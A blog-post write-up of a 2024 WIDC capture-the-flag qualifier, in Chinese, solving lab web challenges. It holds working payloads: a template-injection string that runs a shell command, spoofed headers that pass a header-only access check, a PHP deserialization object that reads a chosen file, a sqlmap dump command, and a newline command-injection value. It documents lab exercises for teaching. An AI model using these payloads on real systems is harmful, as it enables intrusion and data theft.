2024WIDC“天融信杯”信息安全挑战赛预赛

Day1-不安全的车企内网100

SSTI(服务端模板注入):/register 的 user 参数被服务端当作模板表达式求值。根因是把用户输入拼进了模板源码;用户输入应只作为模板变量传入渲染。

POST /register HTTP/1.1
Host: 172.10.0.21:8000
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://172.10.0.21:8000/
Origin: http://172.10.0.21:8000
Accept-Encoding: gzip, deflate
Content-Length: 89

user={{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat ./flag/flag').read()}}&pwd=1323

Day1-升级认证平台100
http://172.10.0.17:1221//.idea/workspace.xml
.idea 目录泄露:Web 根目录下可以直接访问 PhpStorm 的 workspace.xml,内容如下(部署时应排除 .idea 等 IDE 工程目录):

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<project version="4">
<component name="ChangeListManager">
<list default="true" id="6dbcba93-3773-47f3-a52d-67ec58f933e8" name="Default Changelist" comment=""/>
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true"/>
<option name="SHOW_DIALOG" value="false"/>
<option name="HIGHLIGHT_CONFLICTS" value="true"/>
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false"/>
<option name="LAST_RESOLUTION" value="IGNORE"/>
</component>
<component name="FileEditorManager">
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
<file pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/src/PPlab.php">
<provider selected="true" editor-type-id="text-editor"/>
</entry>
</file>
<file pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/src/trueflag.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="34">
<caret line="7" column="22" selection-start-line="7" selection-start-column="22" selection-end-line="7" selection-end-column="22"/>
</state>
</provider>
</entry>
</file>
<file pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/src/index.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="425">
<caret line="30" column="14" selection-start-line="30" selection-start-column="14" selection-end-line="30" selection-end-column="14"/>
</state>
</provider>
</entry>
</file>
<file pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/.idea/workspace.xml">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="-1887"/>
</provider>
</entry>
</file>
</leaf>
</component>
<component name="ProjectFrameBounds" extendedState="6">
<option name="x" value="348"/>
<option name="y" value="80"/>
<option name="width" value="1400"/>
<option name="height" value="1000"/>
</component>
<component name="ProjectView">
<navigator currentView="Scope" currentSubView="Scope 'Project Files'; set:Project Files; class com.intellij.psi.search.scope.ProjectFilesScope" proportions="" version="1">
<foldersAlwaysOnTop value="true"/>
</navigator>
<panes>
<pane id="Scope">
<subPane subId="Scope 'Project Files'; set:Project Files; class com.intellij.psi.search.scope.ProjectFilesScope">
<expand>
<path>
<item name="phpstorm" type="3d21c010:ScopeViewTreeModel$ProjectNode"/>
<item name="" type="442cc68d:ScopeViewTreeModel$RootNode"/>
</path>
</expand>
<select/>
</subPane>
</pane>
<pane id="ProjectPane">
<subPane>
<expand>
<path>
<item name="phpstorm" type="b2602c69:ProjectViewProjectNode"/>
<item name="phpstorm" type="462c0819:PsiDirectoryNode"/>
</path>
<path>
<item name="phpstorm" type="b2602c69:ProjectViewProjectNode"/>
<item name="phpstorm" type="462c0819:PsiDirectoryNode"/>
<item name="src" type="462c0819:PsiDirectoryNode"/>
</path>
</expand>
<select/>
</subPane>
</pane>
</panes>
</component>
<component name="PropertiesComponent">
<property name="WebServerToolWindowFactoryState" value="false"/>
<property name="nodejs_interpreter_path.stuck_in_default_project" value="undefined stuck path"/>
<property name="nodejs_npm_path_reset_for_default_project" value="true"/>
</component>
<component name="RunDashboard">
<option name="ruleStates">
<list>
<RuleState>
<option name="name" value="ConfigurationTypeDashboardGroupingRule"/>
</RuleState>
<RuleState>
<option name="name" value="StatusDashboardGroupingRule"/>
</RuleState>
</list>
</option>
</component>
<component name="SvnConfiguration">
<configuration/>
</component>
<component name="TaskManager">
<task active="true" id="Default" summary="Default task">
<changelist id="6dbcba93-3773-47f3-a52d-67ec58f933e8" name="Default Changelist" comment=""/>
<created>1553763951288</created>
<option name="number" value="Default"/>
<option name="presentableId" value="Default"/>
<updated>1553763951288</updated>
<workItem from="1553763956877" duration="42000"/>
<workItem from="1553764362389" duration="33000"/>
</task>
<servers/>
</component>
<component name="TimeTrackingManager">
<option name="totallyTimeSpent" value="75000"/>
</component>
<component name="ToolWindowManager">
<frame x="66" y="-11" width="1855" height="1092" extended-state="6"/>
<layout>
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.25235197"/>
<window_info id="Structure" order="1" side_tool="true" weight="0.25"/>
<window_info id="Favorites" order="2" side_tool="true"/>
<window_info anchor="bottom" id="Message" order="0"/>
<window_info anchor="bottom" id="Find" order="1"/>
<window_info anchor="bottom" id="Run" order="2"/>
<window_info anchor="bottom" id="Debug" order="3" weight="0.4"/>
<window_info anchor="bottom" id="Cvs" order="4" weight="0.25"/>
<window_info anchor="bottom" id="Inspection" order="5" weight="0.4"/>
<window_info anchor="bottom" id="TODO" order="6"/>
<window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false"/>
<window_info anchor="bottom" id="Database Changes" order="8"/>
<window_info anchor="bottom" id="Version Control" order="9"/>
<window_info anchor="bottom" id="Terminal" order="10"/>
<window_info anchor="bottom" id="Event Log" order="11" side_tool="true"/>
<window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4"/>
<window_info anchor="right" id="Ant Build" order="1" weight="0.25"/>
<window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25"/>
<window_info anchor="right" id="Database" order="3"/>
</layout>
</component>
<component name="TypeScriptGeneratedFilesManager">
<option name="version" value="1"/>
</component>
<component name="editorHistoryManager">
<entry file="file://$PROJECT_DIR$/src/.idea/workspace.xml">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="493">
<caret line="29" column="14" lean-forward="true" selection-start-line="29" selection-start-column="14" selection-end-line="29" selection-end-column="14"/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/src/PPlab.php">
<provider selected="true" editor-type-id="text-editor"/>
</entry>
<entry file="file://$PROJECT_DIR$/src/trueflag.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="34">
<caret line="7" column="22" selection-start-line="7" selection-start-column="22" selection-end-line="7" selection-end-column="22"/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/src/index.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="425">
<caret line="30" column="14" selection-start-line="30" selection-start-column="14" selection-end-line="30" selection-end-column="14"/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/.idea/workspace.xml">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="-1887"/>
</provider>
</entry>
</component>
</project>

从 workspace.xml 记录的已打开文件可知:flag 在 trueflag.php,源码在 /PPlab.php。

GET /PPlab.php HTTP/1.1
Host: 172.10.0.17:1221
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Chrome
X-Forwarded-For: 127.0.0.1

得到源码(请求中的 X-Forwarded-For: 127.0.0.1 和 User-Agent: Chrome 对应源码里的两处请求头检查):

<?php
/**
* Created by PhpStorm.
* User: vvlab
* Date: 22-12-27
* Time: 下午5:38
*/
/**
 * Reads a file and writes its contents to the response.
 *
 * NOTE(review): $filename is a public property and printContent() does no
 * path validation, so whoever sets $filename decides which file is read.
 */
class show {
// Path passed straight to file_get_contents(); no allow-list or base-directory check.
public $filename;
// Echoes the raw contents of $this->filename.
function printContent() {
$content = file_get_contents($this->filename);
echo $content;
}
}
// Access gate built only on request headers: HTTP_X_FORWARDED_FOR and HTTP_USER_AGENT
// are filled from headers the client sends, so neither comparison authenticates the caller.
// NOTE(review): a localhost-only restriction would need the connection's peer address,
// or a header set exclusively by a trusted proxy — confirm against the deployment.
if ($_SERVER['HTTP_X_FORWARDED_FOR'] != '127.0.0.1') {
echo 'Only Localhost can see';
die();
} else if ($_SERVER['HTTP_USER_AGENT'] != 'Chrome') {
echo 'Browser is not Chrome<br>';
echo 'Please use Chrome browser!';
die();
}
// Prints this file's own source into the response once the header checks pass.
show_source(__FILE__);


$a = null;
if (isset($_POST['show'])) {
// SECURITY: unserialize() runs on raw POST data. The class check below only rejects
// other classes; a serialized `show` object keeps whatever filename it carries.
// NOTE(review): prefer a plain identifier mapped to a fixed file, or a data-only
// decode (json_decode, or unserialize with ['allowed_classes' => false]).
$a = unserialize($_POST['show']);
// Anything that is not a `show` instance is replaced by the default text.txt object.
if (!is_object($a)||get_class($a) != 'show') {
$a = new show();
$a->filename = "text.txt";
}

} else {
// No POST parameter: serve the default file.
$a = new show();
$a->filename = "text.txt";
}
// Reads and echoes $a->filename; for a client-supplied object this path is client-chosen.
$a->printContent();
Hello, It doesn't seem to be here. Take a closer look
<?php
// Local helper from the write-up: redeclares a `show` class whose filename defaults to
// 'trueflag.php' and prints the serialized form of one instance.
// NOTE(review): the server-side defect this relies on is in PPlab.php, which unserializes
// POST data and reads the object's filename unchecked; the fix belongs there
// (no unserialize() on request data, fixed set of readable paths).
class show {
public $filename= 'trueflag.php';
function printContent() {
$content = file_get_contents($this->filename);
echo $content;
}
}
$a = new show();
// serialize() emits only the class name and property values, not the method body.
echo serialize($a);
// Printed value:
//O:4:"show":1:{s:8:"filename";s:12:"trueflag.php";}

Day1-不安全的TSP平台

python .\sqlmap.py -l 1.txt -p "password" -D sql -T user -C flag --dump --time-sec=10 --batch --dbms=MySQL

POST /login.php HTTP/1.1
Host: 172.10.0.22
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Referer: http://172.10.0.22/
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Cache-Control: max-age=0
Origin: http://172.10.0.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Length: 21
X-Forwarded-For: 127.0.0.1

username=admin&password=admin

Day1-车载通信协议

Day1-ping出强大

POST /index.php HTTP/1.1
Host: 172.10.0.15:49154
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded

ip=0.0.0.0%0An\l fl\ag.php


2024WIDC“天融信杯”信息安全挑战赛预赛
http://example.com/2024/05/25/2024WIDC“天融信杯”信息安全挑战赛预赛/
作者
J_0k3r
发布于
2024年5月25日
许可协议
BY J_0K3R